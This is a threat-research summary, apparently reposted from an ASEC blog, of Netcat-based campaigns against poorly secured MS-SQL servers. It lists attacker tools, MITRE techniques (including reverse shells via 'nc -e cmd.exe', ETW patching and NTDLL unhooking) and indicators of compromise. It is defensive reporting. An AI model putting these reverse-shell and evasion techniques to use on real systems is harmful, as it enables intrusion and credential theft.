Threat Research

Netcat Attack Cases Targeting MS-SQL Servers (LOLBins) – ASEC BLOG

Securonix

ASEC reports Netcat-laced campaigns targeting poorly managed MS-SQL servers, leveraging multiple tools (including Cobalt Strike, RasmanPotato, Stowaway, and SharpDecryptPwd) to gain control, escalate privileges, and move laterally. The operation employs LOLBins and FTP-based command execution to evade simple detections while targeting exposed databases. #Netcat #CobaltStrike

Keypoints

  • Netcat is being distributed to attack poorly managed MS-SQL servers.
  • Netcat is described as a remote shell option (bind vs reverse), with reverse shell favored for evading NAT/firewalls.
  • Attackers deploy a toolbox including CobaltStrike, RasmanPotato, SharpDecryptPwd, and Stowaway, often via the D:DB directory.
  • Cobalt Strike attempts were blocked by a V3 product; later versions and a Stager download Beacon from C2, with memory execution.
  • RasmanPotato is used for privilege escalation by abusing account tokens and RasMan service.
  • Stowaway provides proxy capability to pivot inside the network and includes anti-detection techniques (NTDLL decoding and ETW patching).
  • Netcat likely leveraged LOLBins and FTP to execute commands via a remote shell, complicating behavior-based detection.

MITRE Techniques

  • [T1110] Brute Force – ‘Poorly managed MS-SQL servers typically refer to those that are exposed to external connections and have simple account credentials, rendering them vulnerable to brute force or dictionary attacks.’
  • [T1059.003] Windows Command Shell – ‘Remote shell… Command Prompt’ and use of cmd.exe to execute commands in Windows environments.
  • [T1105] Ingress Tool Transfer – ‘HTTPS Stager that downloads the backdoor, Beacon, from the C&C server before executing it in the memory.’
  • [T1090] Proxy – ‘Stowaway… proxy tool’ used to access internal network environments.
  • [T1548] Abuse Elevation: Token Impersonation – ‘RasmanPotato… uses the RasMan service for privilege escalation’ and ‘exploit[ing] privileges from account tokens that belong to running processes.’
  • [T1003] Credential Dumping – ‘SharpDecryptPwd is a command line tool that collects and displays account credentials.’
  • [T1027] Obfuscated/Compressed Files and Information – ‘the packer decodes the NTDLL code section loaded in memory to the original NTDLL code… remove the hook installed by security products to evade detection.’
  • [T1562] Impair Defenses – ‘patches the EtwEventWrite() function to be terminated immediately upon being called to prevent events carried out by the malware from being sent to Windows.’
  • [T1059.003] Windows Command Shell – ‘Netcat executed with -e cmd.exe (reverse shell) and FTP-based command execution via the “!” feature’ (note: Windows Command Shell usage described again for Netcat/FTP context).

Indicators of Compromise

  • [MD5] context – 7cc986338d60af5f2b0f1a17d5ed0542, 3cdc614b55c9426a73fcfc194f3c13bc, and 7 more hashes
  • [IP Address] context – 107.175.111.199:52443, 107.175.111.199:8081
  • [Domain] context – ccbsec.ccb.fyi
  • [File Name] context – artifact.exe, git.exe, mimih3.exe, nc64m.exe, rasman.exe, SharpDecryptPwd.exe, info.exe, agent.exe

Read more: https://asec.ahnlab.com/en/49249/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint